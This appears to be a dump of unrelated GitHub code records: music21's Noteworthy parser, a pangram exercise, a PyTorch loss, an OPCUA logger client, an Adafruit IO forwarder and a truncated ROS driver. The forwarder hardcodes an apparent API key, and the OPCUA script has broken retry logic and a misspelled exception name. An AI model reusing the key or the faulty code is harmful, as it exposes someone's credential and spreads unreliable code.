It may also contain some lyrics (see :meth:`parseLyrics`).\n It defines a :meth:`dump` method that return a list of string containing the\n nwctxt-formatted content of each object of the staff.\n '''\n def __init__(self, parent: NWCConverter) -> None:\n self.parent: NWCConverter = parent\n self.lyrics: list[list[bytes]] = []\n self.objects: list[NWCObject] = []\n self.instrumentName: bytes = b''\n self.group = None\n self.layerWithNextStaff = None\n self.transposition = None\n self.partVolume = None\n self.stereoPan = None\n self.color = 0\n self.alignSyllable = None\n self.numberOfLyrics = 0\n self.numberOfObjects = 0\n self.lines = 0\n self.name = None\n self.staffOffset = 0\n self.label: bytes = b''\n self.lyricAlignment = 0\n\n def parse(self):\n # environLocal.warn([self.parent.parsePosition, self.objects])\n self.parseHeader()\n # environLocal.warn(['header done', self.parent.parsePosition, self.objects])\n self.parseLyrics()\n # environLocal.warn(['lyrics done', self.parent.parsePosition, self.objects])\n self.parseObjects()\n # environLocal.warn([self.parent.parsePosition, self.objects])\n\n def dump(self) -> list[str]:\n dumpObjects = []\n\n # default to first midi instrument\n instruName = (self.instrumentName.decode('latin_1')\n if self.instrumentName\n else 'Acoustic Grand Piano')\n label = self.label.decode('latin_1') if self.label else instruName\n\n staffString = '|AddStaff|Name:' + label\n dumpObjects.append(staffString)\n\n staffInstruString = '|StaffInstrument|Name:' + instruName\n if instruName in constants.MidiInstruments:\n staffInstruString += '|Patch:'\n staffInstruString += str(constants.MidiInstruments.index(instruName))\n\n staffInstruString += '|Trans:' + str(self.transposition)\n\n dumpObjects.append(staffInstruString)\n\n for o in self.objects:\n dm = o.dumpMethod\n d = dm(o)\n if d != '':\n dumpObjects.append(d)\n\n return dumpObjects\n\n def parseHeader(self):\n p = self.parent\n # p = NWCConverter()\n self.name = p.readToNUL()\n # print('staff name:', self.name)\n if p.version >= 200:\n self.label = p.readToNUL()\n # print('label:', self.label)\n self.instrumentName = p.readToNUL()\n # print('instrument name:', self.instrumentName)\n self.group = p.readToNUL()\n # print('group: ', self.group)\n\n if p.version >= 200:\n # self.endingBar = p.byteToInt()\n # self.muted = p.byteToInt()\n # junk = p.byteToInt()\n # self.channel = p.byteToInt()\n # junk = p.byteToInt()\n # self.playbackDevice = p.byteToInt()\n # junk = p.byteToInt()\n # self.patchBank = p.byteToInt()\n # junk = p.byteToInt()\n # self.patchName = p.byteToInt()\n # junk = p.byteToInt()\n # self.defaultVelocity = p.byteToInt()\n # self.style = p.readLEShort()\n # self.verticalSizeUpper = p.readLEShort()\n # self.verticalSizeLower = p.readLEShort()\n\n p.skipBytes(27)\n self.lines = p.byteToInt()\n # print('lines:', self.lines)\n # print('position:', p.parsePosition)\n self.layerWithNextStaff = p.readLEShort()\n self.transposition = p.readLEShort()\n self.partVolume = p.readLEShort()\n self.stereoPan = p.readLEShort()\n self.color = p.byteToInt()\n self.alignSyllable = p.readLEShort()\n self.numberOfLyrics = p.readLEShort()\n\n elif p.version == 175:\n p.skipBytes(11)\n instruPatch = p.byteToInt()\n index = instruPatch - 1 if 0 < instruPatch < len(constants.MidiInstruments) else 0\n self.instrumentName = constants.MidiInstruments[index].encode('latin_1')\n p.skipBytes(10)\n self.transposition = p.byteToSignedInt()\n p.skipBytes(6)\n self.alignSyllable = p.readLEShort()\n self.numberOfLyrics = 
p.readLEShort()\n\n if self.numberOfLyrics > 0:\n self.lyricAlignment = p.readLEShort()\n self.staffOffset = p.readLEShort()\n else:\n self.lyricAlignment = 0\n self.staffOffset = 0\n # print('Number of lyrics:', self.numberOfLyrics)\n\n def parseLyrics(self):\n\n p = self.parent\n lyrics = []\n\n for i in range(self.numberOfLyrics):\n syllables = []\n try:\n lyricBlockSize = p.readLEShort()\n except struct.error:\n lyricBlockSize = 0\n environLocal.warn('Could not read lyrics. Trying with zero length.')\n # print('lyric block size: ', lyricBlockSize)\n\n if lyricBlockSize > 0:\n unused_lyricSize = p.readLEShort()\n parsePositionStart = p.parsePosition\n\n # print('lyric Size: ', lyricSize)\n junk = p.readLEShort()\n continueIt = True\n maxRead = 1000\n while continueIt is True and maxRead > 0:\n syllable = p.readToNUL()\n # environLocal.warn([p.parsePosition, syllable, 'syllable'])\n maxRead -= 1\n # print('syllable: ', syllable)\n if syllable == b'':\n continueIt = False\n else:\n syllables.append(syllable)\n p.parsePosition = parsePositionStart + lyricBlockSize\n lyrics.append(syllables)\n # print(syllables)\n # print(lyrics)\n if self.numberOfLyrics > 0:\n junk = p.readLEShort()\n junk_2 = p.readLEShort()\n # print(p.parsePosition)\n self.lyrics = lyrics\n return lyrics\n\n def parseObjects(self):\n p = self.parent\n objects = []\n self.numberOfObjects = p.readLEShort()\n if p.version > 150:\n self.numberOfObjects -= 2\n\n # print('Number of objects: ', self.numberOfObjects)\n for i in range(self.numberOfObjects):\n thisObject = NWCObject(staffParent=self, parserParent=p)\n thisObject.parse()\n objects.append(thisObject)\n self.objects = objects\n # print(objects)\n return objects\n\n\nclass NWCObject:\n '''\n NWCObject class is a union that can be used for each type of object contained in a staff.\n\n An object binary blob starts with its type.\n The parse() method calls the appropriate method depending on the object type.\n Each parsing method should set up the 'dumpMethod' method that return the nwctxt version\n of the object.\n '''\n def __init__(self, staffParent: NWCStaff, parserParent: NWCConverter):\n self.staffParent: NWCStaff = staffParent\n self.parserParent: NWCConverter = parserParent\n self.type = None\n self.placement = 0\n self.pos = 0\n self.style = 0\n self.localRepeatCount = 0\n self.data = 0\n self.data1 = None\n self.data2 = None\n self.data3 = None\n self.delay = 0\n self.clefType = 0\n self.offset = 0\n self.visible = 0\n self.duration = 0\n self.durationStr = None\n self.font = 0\n self.sharps = 0\n self.octaveShift = 0\n self.octaveShiftName = None\n self.clefName = None\n self.attribute1 = None\n self.attribute2 = 0\n self.stemLength = 0\n self.dots = 0\n self.bits = 0\n self.denominator = 0\n self.tieInfo = ''\n self.volume = 0\n self.base = 0\n self.velocity = 0\n self.count = 0\n self.name = None\n self.value = 0\n self.flats = 0\n self.keyString = ''\n self.numerator = 0\n self.alterationStr = ''\n self.dotAttribute = None\n self.text = None\n\n def genericDumpMethod(inner_self) -> str:\n return ''\n\n self.dumpMethod = genericDumpMethod\n\n def parse(self):\n '''\n determine what type of object I am, and set things accordingly\n '''\n p = self.parserParent\n objectType = p.readLEShort() # a number -- an index in the objMethods list\n if objectType >= len(self.objMethods) or objectType < 0:\n raise NoteworthyBinaryTranslateException(\n f'Cannot translate objectType: {objectType}; max is {len(self.objMethods)}')\n if p.version >= 170:\n self.visible = 
p.byteToInt()\n else:\n self.visible = 0\n\n objectMethod = self.objMethods[objectType]\n\n objectMethod(self)\n\n # Start parsing specific objects\n # =================================\n\n def clef(self):\n '''\n clef info,\n 4 bytes\n '''\n p = self.parserParent\n # print('Clef at: ', p.parsePosition)\n self.type = 'Clef'\n self.clefType = p.readLEShort()\n self.octaveShift = p.readLEShort()\n\n if self.clefType < len(constants.ClefNames):\n self.clefName = constants.ClefNames[self.clefType]\n if self.octaveShift < len(constants.OctaveShiftNames):\n self.octaveShiftName = constants.OctaveShiftNames[self.octaveShift]\n\n # print('now at: ', p.parsePosition)\n def dump(inner_self):\n build = '|Clef|'\n if inner_self.clefName:\n build += 'Type:' + inner_self.clefName + '|'\n if inner_self.octaveShiftName:\n build += 'OctaveShift:' + inner_self.octaveShiftName + '|'\n return build\n\n self.dumpMethod = dump\n\n def keySig(self):\n '''\n Key signature\n 10 bytes\n '''\n p = self.parserParent\n self.type = 'KeySig'\n self.flats = p.byteToInt()\n p.skipBytes(1) # ?\n self.sharps = p.byteToInt()\n p.skipBytes(7)\n\n # too complex...\n # for letter in ['A', 'B', 'C', 'D', 'E', 'F', 'G']:\n # bitshift = ord(letter) - ord('A')\n # letterMask = 1 << bitshift\n\n if self.flats > 0 and self.flats in constants.FlatMask:\n self.keyString = constants.FlatMask[self.flats]\n elif self.sharps > 0 and self.sharps in constants.SharpMask:\n self.keyString = constants.SharpMask[self.sharps]\n else:\n self.keyString = '' # no unusual key signatures\n\n def dump(inner_self):\n build = '|Key|Signature:' + inner_self.keyString\n return build\n\n self.dumpMethod = dump\n\n def barline(self):\n '''\n Bar line\n 2 bytes\n '''\n p = self.parserParent\n self.type = 'Barline'\n self.style = p.byteToInt()\n self.localRepeatCount = p.byteToInt()\n\n self.parserParent.currentAlterations = {}\n\n def dump(inner_self):\n build = '|Bar|'\n # we don't care about 'Single', as it is the default\n if 0 < inner_self.style < len(constants.BarStyles):\n styleString = constants.BarStyles[inner_self.style]\n build += '|Style:' + styleString\n return build\n\n self.dumpMethod = dump\n\n def ending(self):\n '''\n Endings\n 2 bytes\n '''\n p = self.parserParent\n self.type = 'Ending'\n self.style = p.byteToInt()\n p.skipBytes(1)\n\n def dump(inner_self):\n return '|Ending|Endings:' + str(inner_self.style)\n\n self.dumpMethod = dump\n\n def instrument(self):\n '''\n Instrument\n 8 bytes\n '''\n p = self.parserParent\n self.type = 'Instrument'\n # self.name = p.readToNUL()\n # p.skipBytes(1)\n p.skipBytes(8) # velocity\n\n def timeSig(self):\n '''\n Time signature\n 6 bytes\n '''\n p = self.parserParent\n self.type = 'TimeSig'\n self.numerator = p.readLEShort()\n self.bits = p.readLEShort()\n self.denominator = 1 << self.bits\n self.style = p.readLEShort()\n\n def dump(inner_self):\n build = f'|TimeSig|Signature:{inner_self.numerator}/{inner_self.denominator}'\n return build\n\n self.dumpMethod = dump\n\n def tempo(self):\n '''\n Tempo indications\n 5 bytes + null terminated string\n '''\n p = self.parserParent\n self.type = 'Tempo'\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n self.value = p.readLEShort()\n self.base = p.byteToInt()\n if p.version < 170:\n junk = p.readLEShort()\n self.text = p.readToNUL()\n\n def dump(inner_self):\n return f'|Tempo|Tempo:{inner_self.value}'\n\n self.dumpMethod = dump\n\n\n def dynamic(self):\n '''\n dynamics\n 7 bytes\n '''\n p = self.parserParent\n self.type = 'Dynamic'\n if p.version < 
170:\n print('Dynamics on version below 1.70 is not supported yet')\n else:\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n self.style = p.byteToInt()\n self.velocity = p.readLEShort()\n self.volume = p.readLEShort()\n\n def setDurationForObject(self):\n '''\n get duration string for note or rest\n '''\n\n durStr = constants.DurationValues[self.duration]\n\n grace = 0\n triplet = False\n if self.type == 'Note':\n self.dotAttribute = self.attribute1[0]\n grace = self.attribute1[1] & 0x20\n else:\n self.dotAttribute = self.data2[3]\n\n # start 0101, middle 1010, end 1111\n triplet = self.data2[1] & 0x0c\n\n ordDot = self.dotAttribute\n\n if (ordDot & 0x01) > 0:\n self.dots = 2\n elif (ordDot & 0x04) > 0:\n self.dots = 1\n else:\n self.dots = 0\n\n if self.dots == 1:\n durStr += ',Dotted'\n elif self.dots == 2:\n durStr += ',DblDotted'\n\n if grace > 0:\n durStr += ',Grace'\n\n if triplet:\n durStr += ',Triplet'\n\n return durStr\n\n def note(self):\n '''\n Note\n 8 bytes\n '''\n p = self.parserParent\n self.type = 'Note'\n # print('Note at parse position: ', p.parsePosition)\n if p.version < 170:\n print('Cannot yet handle versions before 170')\n else:\n self.duration = p.byteToInt()\n self.data2 = p.readBytes(3) # ??\n self.attribute1 = p.readBytes(2)\n # print(hex(ord(self.attribute1[0])))\n self.pos = p.byteToSignedInt()\n self.pos = -1 * self.pos\n self.attribute2 = p.byteToInt()\n if p.version <= 170:\n self.data3 = p.readBytes(2)\n else:\n self.data3 = None\n if p.version >= 200:\n if (self.attribute2 & 0x40) != 0:\n # print('have stemLength info!')\n self.stemLength = p.byteToInt()\n else:\n # print('attribute 2:', hex(self.attribute2))\n self.stemLength = 7\n else:\n self.stemLength = 7\n # if p.version >= 200 and (self.attribute2 & 0x40) != 0:\n # self.stemLength = p.byteToInt()\n # else:\n # self.stemLength = 7\n # uh oh!!!\n # p.skipBytes(2)\n # print('Now at: ', p.parsePosition)\n # print('Duration: ', self.duration)\n # print('Data2: ',)\n # for i in self.data2:\n # print(hex(ord(i)),)\n # print('...')\n\n self.durationStr = self.setDurationForObject()\n\n alterationIndex = self.attribute2 & 0x07\n if alterationIndex < len(constants.AlterationTexts):\n self.alterationStr = constants.AlterationTexts[alterationIndex]\n else:\n self.alterationStr = ''\n\n\n # in NWC, alteration is not specified for other octave\n if self.alterationStr == '':\n self.alterationStr = self.parserParent.currentAlterations.get(self.pos % 7, '')\n if self.alterationStr is None:\n self.alterationStr = ''\n self.parserParent.currentAlterations[self.pos % 7] = self.alterationStr\n\n self.tieInfo = ''\n ordAtt1 = self.attribute1[0]\n if (ordAtt1 & 0x10) > 0:\n self.tieInfo = '^'\n\n def dump(inner_self):\n build = '|Note|Dur:' + inner_self.durationStr + '|'\n\n build += ('Pos:'\n + inner_self.alterationStr\n + str(inner_self.pos)\n + inner_self.tieInfo + '|')\n return build\n\n self.dumpMethod = dump\n\n def rest(self):\n '''\n Rest\n 8 bytes\n '''\n p = self.parserParent\n self.type = 'Rest'\n if p.version <= 150:\n print('igg...')\n else:\n self.duration = p.byteToInt()\n self.data2 = p.readBytes(5)\n self.offset = p.readLEShort()\n\n self.durationStr = self.setDurationForObject()\n\n def dump(inner_self):\n build = '|Rest|Dur:' + inner_self.durationStr + '|'\n return build\n\n self.dumpMethod = dump\n\n def noteChordMember(self):\n '''\n Chord member\n 8 bytes + n Note objects\n '''\n p = self.parserParent\n self.type = 'NoteChordMember'\n numberOfNotes = 0\n if p.version <= 170:\n self.data1 
= p.readBytes(12)\n elif p.version == 175:\n self.data1 = p.readBytes(10)\n numberOfNotes = self.data1[8]\n else:\n self.data1 = p.readBytes(8)\n if p.version >= 200:\n if (self.data1[7] & 0x40) != 0:\n print('have stemLength info!')\n self.stemLength = p.byteToInt()\n else:\n # print('attribute 2:', hex(self.attribute2))\n self.stemLength = 7\n else:\n self.stemLength = 7\n\n self.data2 = []\n if t.TYPE_CHECKING:\n assert isinstance(self, NWCStaff)\n for i in range(numberOfNotes):\n chordNote = NWCObject(staffParent=self, parserParent=p)\n chordNote.parse()\n self.data2.append(chordNote)\n\n def dump(inner_self):\n build = '|Chord'\n notes = {}\n for d in inner_self.data2:\n if notes.get(d.durationStr) is None:\n notes[d.durationStr] = []\n\n notes[d.durationStr].append(d.alterationStr + str(d.pos) + d.tieInfo)\n\n for n in notes:\n build += '|Dur:' + n + '|Pos:' + ','.join(notes[n])\n\n return build\n\n self.dumpMethod = dump\n\n\n\n def pedal(self):\n '''\n Pedal\n 3 bytes\n '''\n p = self.parserParent\n self.type = 'Pedal'\n if p.version < 170:\n print('Pedal on version below 170 is not yet supported')\n else:\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n self.style = p.byteToInt()\n\n def flowDir(self):\n '''\n Flow\n 4 bytes\n '''\n p = self.parserParent\n self.type = 'FlowDir'\n if p.version >= 170:\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n else:\n self.pos = -8 # so needs to be signed int?\n self.placement = 0x01\n\n self.style = p.readLEShort()\n\n def mpc(self):\n '''\n Midi Instructions\n 34 bytes\n '''\n p = self.parserParent\n self.type = 'MPC'\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n if p.version == 175:\n self.data1 = p.readBytes(32)\n elif p.version > 155:\n self.data1 = p.readBytes(31)\n else:\n self.data1 = p.readBytes(32)\n\n def tempoVariation(self):\n '''\n Tempo variation\n 4 bytes\n '''\n p = self.parserParent\n self.type = 'TempoVariation'\n if p.version >= 170:\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n self.style = p.byteToInt()\n self.delay = p.byteToInt()\n else:\n self.style = p.byteToInt()\n self.style = self.style & 0x0F\n self.pos = p.byteToInt()\n self.placement = p.byteToInt()\n self.delay = p.byteToInt()\n\n def dynamicVariation(self):\n '''\n Dynamic variation\n 3 bytes\n '''\n p = self.parserParent\n self.type = 'DynamicVariation'\n self.pos = p.byteToInt()\n if p.version >= 170:\n self.placement = p.byteToInt()\n else:\n self.placement = 0\n self.style = p.byteToInt()\n\n def performance(self):\n '''\n Performance\n 3 bytes\n '''\n p = self.parserParent\n self.type = 'Performance'\n self.pos = p.byteToInt()\n if p.version >= 170:\n self.placement = p.byteToInt()\n else:\n self.placement = 0\n self.style = p.byteToInt()\n\n def textObj(self):\n '''\n Text\n 3 bytes + null terminated string\n '''\n p = self.parserParent\n self.type = 'Text'\n self.pos = p.byteToSignedInt()\n self.data = p.byteToInt()\n # role of the text (lyric, staff info ...)\n self.font = p.byteToInt()\n self.text = p.readToNUL()\n\n def dump(inner_self):\n build = '|Text|Text:' + inner_self.text.decode('latin_1') + '|Pos:' + str(self.pos)\n return build\n\n if self.text is not None:\n self.dumpMethod = dump\n\n\n def restChordMember(self):\n '''\n Rest chord\n 10 bytes\n '''\n self.noteChordMember()\n self.type = 'RestChordMember'\n if t.TYPE_CHECKING:\n assert isinstance(self, NWCStaff)\n rest = NWCObject(staffParent=self, parserParent=self.parserParent)\n rest.duration = self.data1[0]\n rest.data2 = 
self.data1\n rest.durationStr = rest.setDurationForObject()\n self.data2.append(rest)\n\n def dump(inner_self):\n build = '|Chord'\n notes = {}\n for d in inner_self.data2:\n if notes.get(d.durationStr) is None:\n notes[d.durationStr] = []\n\n notes[d.durationStr].append(d.alterationStr + str(d.pos) + d.tieInfo)\n\n i = 0\n for n in notes:\n if i == len(notes) - 1:\n build += '|Dur2:' + n + '|Pos2:' + ','.join(notes[n])\n else:\n build += '|Dur:' + n + '|Pos:' + ','.join(notes[n])\n i += 1\n\n return build\n\n self.dumpMethod = dump\n\n # list of methods to parse specific object. The index in the list\n # is the ID of the object to parse.\n # see NWCObject.parse\n objMethods = [clef, # 0\n keySig, # 1\n barline, # 2\n ending, # 3\n instrument, # 4\n timeSig, # 5\n tempo, # 6\n dynamic, # 7\n note, # 8\n rest, # 9\n noteChordMember, # 10\n pedal, # 11\n flowDir, # 12\n mpc, # 13\n tempoVariation, # 14\n dynamicVariation, # 15\n performance, # 16\n textObj, # 17\n restChordMember # 18\n ]\n\n\nif __name__ == '__main__':\n import music21\n music21.mainTest()\n # fp = '/Users/cuthbert/Desktop/395.nwc'\n # fp = 'http://www.cpdl.org/brianrussell/358.nwc'\n # from music21 import converter\n # s = converter.parse(fp)\n # s.show()\n\n # nwc = NWCConverter()\n # s = nwc.parseFile(fp)\n # s.show()\n # print(nwc.dumpToNWCText())\n # print(nwc.isValidNWCFile())\n # print(nwc.fileVersion())\n","repo_name":"cuthbertLab/music21","sub_path":"music21/noteworthy/binaryTranslate.py","file_name":"binaryTranslate.py","file_ext":"py","file_size_in_byte":36806,"program_lang":"python","lang":"en","doc_type":"code","stars":1878,"dataset":"github-code","pt":"72"} +{"seq_id":"74747758952","text":"import string\n\ndef is_pangram(sentence):\n \n # All lowercase Letters in the alphabet\n alfabeto = string.ascii_lowercase \n\n # Create a dictinary with Key \"letter\" and value 1\n all_letters = {letra: 1 for letra in alfabeto}\n \n for each_letter in sentence:\n if each_letter.lower() not in alfabeto:\n continue\n all_letters[each_letter.lower()] -= 1\n \n print(all_letters)\n control = True\n for each in all_letters.values():\n if each > 0:\n control = False\n\n return control\n\nprint(is_pangram('Five quacking Zephyrs jolt my wax bed.'))\n\n\n\n","repo_name":"tiagocazali/Exercism_Python","sub_path":"pangram/pangram.py","file_name":"pangram.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19667183707","text":"class Character:\n def __init__(self, name, classType, pi, stars, attack=False, defense=False):\n self.name = name\n self.classType = classType\n self.pi = pi\n self.stars = stars\n self.attack = attack\n self.defense = defense\n\n def __str__(self):\n padding = 25 - len(self.name)\n\n temp = \"\\t\" + self.name\n for j in range(padding):\n temp += \" \"\n temp += \"(\" + self.classType + \"):\"\n padding = 10 - len(self.classType)\n for j in range(padding):\n temp += \" \"\n temp += \"%d \" % self.pi\n for i in range(self.stars):\n temp += \"*\"\n if (self.attack == True):\n temp += ' \\tAttacker\\n'\n elif (self.defense == True):\n temp += ' \\tDefender\\n'\n else:\n temp += '\\n'\n return temp\n\n def convertToCsv(self):\n temp = [self.name, self.classType, self.pi, self.stars, self.attack, self.defense]\n return 
temp\n","repo_name":"dschrimpsher/mcoc_aw_diversity","sub_path":"src/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18083986802","text":"import torch\nimport torch.nn as nn\nimport math\nimport numpy as np\nimport torch.nn.functional as F\n\n\ndef SL_EPE(input_flow, target_flow):\n target_valid = (target_flow < 192) & (target_flow > 0)\n return F.smooth_l1_loss(input_flow[target_valid], target_flow[target_valid], size_average=True)\n\ndef EPE(input_flow, target_flow):\n \n target_valid = target_flow < 192\n return F.l1_loss(input_flow[target_valid], target_flow[target_valid], size_average=True)\n\nclass MultiScaleLoss(nn.Module):\n\n def __init__(self, scales, downscale, weights=None, loss='L1', mask=False):\n super(MultiScaleLoss, self).__init__()\n self.downscale = downscale\n self.mask = mask\n self.weights = torch.Tensor(scales).fill_(1).cuda() if weights is None else torch.Tensor(weights).cuda()\n assert(len(self.weights) == scales)\n\n if type(loss) is str:\n\n if loss == 'L1':\n self.loss = nn.L1Loss()\n elif loss == 'MSE':\n self.loss = nn.MSELoss()\n elif loss == 'SmoothL1':\n self.loss = nn.SmoothL1Loss()\n elif loss == 'MAPE':\n self.loss = MAPELoss()\n else:\n self.loss = loss\n self.multiScales = [nn.AvgPool2d(self.downscale*(2**i), self.downscale*(2**i)) for i in range(scales)]\n print('self.multiScales: ', self.multiScales, ' self.downscale: ', self.downscale)\n\n def forward(self, input, target):\n if (type(input) is tuple) or (type(input) is list):\n out = 0\n \n for i, input_ in enumerate(input):\n target_ = self.multiScales[i](target)\n if self.mask:\n # work for sparse\n mask = target > 0\n mask.detach_()\n \n mask = mask.type(torch.cuda.FloatTensor)\n pooling_mask = self.multiScales[i](mask) \n\n # use unbalanced avg\n target_ = target_ / pooling_mask\n\n mask = target_ > 0\n mask.detach_()\n input_ = input_[mask]\n target_ = target_[mask]\n\n EPE_ = SL_EPE(input_, target_)\n out += self.weights[i] * EPE_\n else:\n out = self.loss(input, self.multiScales[0](target))\n return out\n\ndef multiscaleloss(scales=5, downscale=4, weights=None, loss='L1', sparse=False, mask=False):\n if weights is None:\n weights = (0.005, 0.01, 0.02, 0.08, 0.32)\n if scales == 1 and type(weights) is not tuple:\n weights = (weights, )\n return MultiScaleLoss(scales, downscale, weights, loss, mask)\n","repo_name":"rowandempster/Unsupervised-Disparity-Estimation","sub_path":"src/IRS/losses/multiscaleloss.py","file_name":"multiscaleloss.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"27550796294","text":"import argparse \nimport datetime\nimport opcua\nimport time \n\n\ndef connect_opcua(conn:str):\n \"\"\"\n Connect to OPCUA client\n :args: \n conn:str - OPCUA connection info \n :param: \n client:opcua.client.client.Client - connection to OPCUA \n start:time.time.time - process start time \n boolean:bool - whether to exit while \n error_msg:list - record of error messages \n :return:\n client \n \"\"\"\n client = None \n start = time.time() \n boolean = False \n error_msg = [] \n while boolean == False:\n try:\n client = opcua.Client(\"opc.tcp://%s/\" % conn)\n client.connect()\n except Exeception as e: \n if e not in error_msg: \n print('%s - Failed to connect to OPCUA (Error: %s)' % (datetime.datetime.now(), e)) \n error_msg.append(e) \n if 
time.time() > (start * 3605):\n print('%s - FAiled to connect to OPCUA for over an hour' % datetime.datetime())\n status = True \n else: \n time.sleep(30) \n else:\n boolean = True \n\n return client\n\n\ndef disconnect_opcua(client)->bool:\n \"\"\"\n Disconnect from OPCUA\n :args:\n client:opcua.client.client.Client - connection to OPCUA\n :param: \n status:bool \n :return:\n status \n \"\"\"\n status = True \n try:\n client.disconnect()\n except Exception as e: \n print('Faield to disconnect from OPCUA (Error: %s)' % e)\n status = False\n return status \n\n\ndef get_datalogger(client, tags:list)->(dict, str):\n \"\"\"\n Exttract data from logger\n :args: \n client:opcua.client.client.Client - connection to OPCUA \n tags:list - list of tags to get data from for OPCUA \n :param: \n data:dict - data from OPCUA\n :return: \n data and timestamp\n \"\"\"\n data = {'timestamp': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')}\n for tag in tags: \n try: \n output = client.get_node(\"ns=4;s=%s\" % tag)\n except Exception as e: \n print('Failed to get data for %s (Error: %s)' % (tag, e))\n output = None\n if output is not None: \n try: \n data[tag] = output.get_value()\n except Exception as e: \n print('Failed to get value for %s data (Error: %s)' % (tag, e))\n\n return data\n\n\ndef main(): \n \"\"\"\n The following is an example of how to pull data from an OPCUA. Tested against the Ai-Ops krt-DataLogger.service \n :links: \n --> Test Tools: https://opcfoundation.org/developer-tools/certification-test-tools/opc-ua-compliance-test-tool-uactt/\n --> OPCUA documentation: https://python-opcua.readthedocs.io/en/latest/\n --> Sample code: https://github.com/FreeOpcUa/python-opcua/tree/master/examples\n :args: \n conn OPCUA connection info [default: 192.168.50.19:4840]\n tags OPCUA list of tags [sample list: FIC11_FB.fActualValue,FIC11_FB.fActualValue,FIC11_FB.fSetpointValue,FIC11_FB.FIC11.fOut]\n :param: \n client:opcua.client.client.Client - connection to the OPCUA \n tags:list - list of tags based based on user input \n data:dict - data from DataLogger \n timestamp:str - timestamp for data from DataLogger \n \"\"\"\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('conn', type=str, default='192.168.50.19:4840', help='OPCUA connection info [default: 192.168.50.19:4840]') \n parser.add_argument('tags', type=str, default=None, help='OPCUA list of tags [sample list: FIC11_FB.fActualValue,FIC11_FB.fActualValue,FIC11_FB.fSetpointValue,FIC11_FB.FIC11.fOut]')\n args = parser.parse_args() \n if args.tags == None: \n print('Tags cannot be an empty string') \n exit(1) \n\n try: \n tags = list(args.tags.split(','))\n except Exception as e: \n print('Failed to convert tags into a list of tags (Error: %s)' % e)\n exit(1) \n\n client = connect_opcua(args.conn)\n print(get_datalogger(client, tags))\n disconnect_opcua(client) \n\n\nif __name__ == '__main__': \n main() \n","repo_name":"oshadmon/Udemy","sub_path":"opcua.py","file_name":"opcua.py","file_ext":"py","file_size_in_byte":4234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32648015335","text":"import time\nfrom tinydb import TinyDB, Query\ndb = TinyDB('data_buffer.json')\nquery = Query()\n\nfrom Adafruit_IO import *\n# from private import aio_key\naio_key = \"97ab045aa058453b900ba118206a2e31\"\naio = Client(aio_key)\n\ndef get_current_data():\n data = db.all()\n max = 0\n for item in data:\n if item['time'] > max:\n max = 
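A minimal sketch of driving the script above (the address and tag names are the sample values from its own docstring; the snippet assumes the three helpers are already in scope, since the script defines them at module level):

# From a shell:
#   python3 opcua.py 192.168.50.19:4840 "FIC11_FB.fActualValue,FIC11_FB.fSetpointValue"
#
# Or calling the helpers directly:
client = connect_opcua('192.168.50.19:4840')    # blocks until the server answers
readings = get_datalogger(client, ['FIC11_FB.fActualValue', 'FIC11_FB.fSetpointValue'])
print(readings)                                 # {'timestamp': ..., tag: value, ...}
disconnect_opcua(client)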
+{"seq_id":"32648015335","text":"import time\nfrom tinydb import TinyDB, Query\ndb = TinyDB('data_buffer.json')\nquery = Query()\n\nfrom Adafruit_IO import *\n# from private import aio_key\naio_key = \"97ab045aa058453b900ba118206a2e31\"\naio = Client(aio_key)\n\ndef get_current_data():\n    data = db.all()\n    max = 0\n    for item in data:\n        if item['time'] > max:\n            max = item['time']\n    print(\"Max time = \", max)\n    print(\"# items = \",len(data))\n    # delete all items where time <= max\n    # db.remove(query.time <= max)\n    return data\n\nwhile True:\n    data = get_current_data()\n    for item in data:\n        print('temp', item['value'])\n        aio.send('temp', item['value'])\n    time.sleep(60*15)\n\n","repo_name":"davidporter/data_streams","sub_path":"final/bitcode/forward_to_adafruitio.py","file_name":"forward_to_adafruitio.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"16421827828","text":"#!/usr/bin/env python3\n\n# Bill Smart, smartw@oregonstate.edu\n#\n# This example gives the basic code for driving a robot around.\n\n\n# Import ROS Python basic API and sys\nimport rospy\nimport sys\n\n\n# Velocity commands are given with Twist messages, from geometry_msgs\nfrom geometry_msgs.msg import Twist\n\n\nif __name__ == '__main__':\n\t# Initialize the node, and call it \"driver\".\n\trospy.init_node('driver', argv=sys.argv)\n\n\t# Set up a publisher. The default topic for Twist messages is cmd_vel.\n\tpublisher = rospy.Publisher('cmd_vel', Twist, queue_size=10)\n\n\t# 10 Hz is a good rate to control a slow-moving robot.\n\trate = rospy.Rate(10)\n\n\t# This will loop until ROS shuts down the node. This can be done on the\n\t# command line with a ctrl-C, or automatically from roslaunch.\n\twhile not rospy.is_shutdown():\n\t\t# Create a Twist and fill in the information. Note that we fill in values\n\t\t# even for the elements we're not going to use. We don't have to do this,\n\t\t# but it's good practice.\n\t\tt = Twist()\n\t\tt.linear.x = 0.2\n\t\tt.linear.y = 0.0\n\t\tt.linear.z = 0.0\n\t\tt.angular.x = 0.0\n\t\tt.angular.y = 0.0\n\t\tt.angular.z = 0.0\n\n\t\t# Publish the velocity command.\n\t\tpublisher.publish(t)\n\n\t\t# Print out a log message to the INFO channel to let us know it's working.\n\t\trospy.loginfo(f'Published {t.linear.x}')\n\n\t\t# Make sure we're publishing at the right 